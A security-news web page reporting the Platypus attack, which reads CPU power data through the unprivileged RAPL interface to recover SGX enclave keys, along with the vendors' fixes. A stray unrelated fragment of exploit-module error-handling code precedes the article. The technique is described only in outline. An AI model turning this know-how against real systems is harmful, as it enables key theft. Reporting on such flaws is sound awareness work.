          select(nil, nil, nil, 10)
        end
      rescue ::Rex::ConnectionError
        fail_with(Failure::Unreachable, "#{peer} - Failed to connect to the web server")
      end
    end
  end
##realinfosec.net

Bookmark
Please login to bookmarkClose

Intel and AMD processors affected by another side-channel exploit

By
Steven Black (n0tst3)
-
0
sidechan
sidechan

Two years after Spectre and Meltdown, the x86 processor faces another side-channel exploit – only this time, it is based on sensing temperature

While Spectre and Meltdown may be long forgotten, a microprocessor flaw using a side-channel attack, dubbed Platypus, is again haunting Intel and AMD.

An international team of security researchers has found that fluctuations in software power consumption can be exploited to access sensitive data on Intel processors.

The researchers describe power side-channel attacks as attacks that exploit fluctuations in power consumption to extract sensitive data such as cryptographic keys.

In the past, attacks trying to exploit power measurements were not particularly accurate or effective, as they required physical access to the target device and special measurement tools such as an oscilloscope. 

But a research team, led by the Institute of Applied Information Processing and Communications at Graz University of Technology, together with the University of Birmingham and the Helmholtz Center for Information Security (CISPA), has identified a way through which power side-channel attacks can access sensitive data with unprecedented accuracy – even without physical access. 

The team said they were able to demonstrate such an attack on desktop PCs, laptops and cloud computing servers from Intel and AMD.

David Oswald, senior lecturer in cyber security at the University of Birmingham, said: “Platypus attacks show that power side channels – which were previously only relevant to small embedded devices like payment cards – are a relevant threat to processors in our laptops and servers.

“Our work connects the dots between two research areas and highlights that power side-channel leakage has much wider relevance than previously thought.”

The researchers found that the RAPL (Running Average Power Limit) interface built into Intel and AMD CPUs, which monitors processor energy consumption, can be read without requiring system admin access. They claimed that this means measured values can be read out without any authorisations. 

The second part of the attack involves Intel’s Software Guard Extensions (SGX), which is designed to move data and critical programs to an isolated environment, called an enclave, where they are secure – even if the normal operating system is already compromised by malware. 

The researchers said they were able to use a compromised operating system to target Intel SGX, and made the processor execute certain instructions tens of thousands of times within an SGX enclave. By measuring the power consumption of each of these commands, the researchers said they were eventually reconstructed data and cryptographic keys. 

Oswald said Intel is currently pushing microcode updates to address the attack against Intel SGX. “There will be a Linux kernel patch that disables the access to the RAPL interface from unprivileged code,” he added, meaning that only the Linux “root” user on the system-wide access can read RAPL measurements.

Bookmark
Please login to bookmarkClose
1...757677...79Page 76 of 79

Editor Picks

Featured

Cyber Academy

ABOUT US

RiSec represents an autonomous, non-profit alliance comprising of individuals dedicated to enhancing cybersecurity awareness and education. Read more

Contact us: security@realinfosec.net

Social

Subscribe for weekly updates

Copyright © RiSec 2023 All rights reserved.
All trademarks, logos, images and brand names are the property of their respective owners.